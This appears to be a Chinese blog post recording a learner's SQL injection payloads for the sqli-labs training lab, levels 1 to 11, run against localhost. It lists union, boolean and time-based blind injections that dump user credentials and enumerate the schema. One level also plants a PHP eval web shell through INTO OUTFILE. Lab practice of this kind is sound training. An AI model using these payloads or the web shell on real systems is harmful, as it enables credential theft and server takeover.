最近入职培训了一段时间,感觉自己安全基础还是不够牢固,从头开始学习吧,把《白帽子学Web安全》在看几遍,也给自己立个Flag:每周至少研究一个漏洞的源码,产出报告。
这周把sqli-labs的题目都做一遍,写一遍payload。
Page-1
Less-1:http://localhost/sqli-labs-php7/Less-1/?id=-1' union select 1,group_concat(id,'-',username,'-',password, '---'),3 from users -- %20
Less-2:http://localhost/sqli-labs-php7/Less-2/?id=-1 union select 1,group_concat(id,'-',username,'-',password, '---'),3 from users -- %20
Less-3:
http://localhost/sqli-labs-php7/Less-3/?id=-1') union select 1,group_concat(id,"-",username,"-",password, "---"),3 from users -- %20
Less-4:http://localhost/sqli-labs-php7/Less-4/?id=-1") union select 1,group_concat(id,"-",username,"-",password, "---"),3 from users -- %20
Less-5:盲注
//爆库
?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
//爆表
?id=1' and left((select table_name from information_schema.tables where information_schema.tables.table_schema=database() limit 0,1),1)='e' --+
//爆字段
id=1' and left((select column_name from information_schema.columns where table_name='users' and table_schema=database()limit 2,1),8)='password' --+
//爆数据
?id=1' and left((select username from users order by id limit 0,1),4)='Dumb' --+
Less-6 盲注
//爆库
?id=1" and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
//爆表
?id=1" and left((select table_name from information_schema.tables where information_schema.tables.table_schema=database() limit 0,1),1)='e' --+
//爆字段
id=1" and left((select column_name from information_schema.columns where table_name='users' and table_schema=database()limit 2,1),8)='password' --+
//爆数据
?id=1" and left((select username from users order by id limit 0,1),4)='Dumb' --+
less-7 写文件注入
?id=1')) union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "/Applications/XAMPP/xamppfiles/1.php" --+
less-8 布尔盲注
?id=1' and left((select username from users order by id limit 0,1),4)='dumb' --+
less-9 单引号时间盲注
?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1) --+
less-10 双引号时间盲注
?id=1" and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1) --+
less-11
//爆表
' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() --
//爆列
' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema = database() --
//爆数据
' union select 1, group_concat(username,":",password," ") from users --
来源:https://www.cnblogs.com/kimjun/p/13185609.html
1640
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
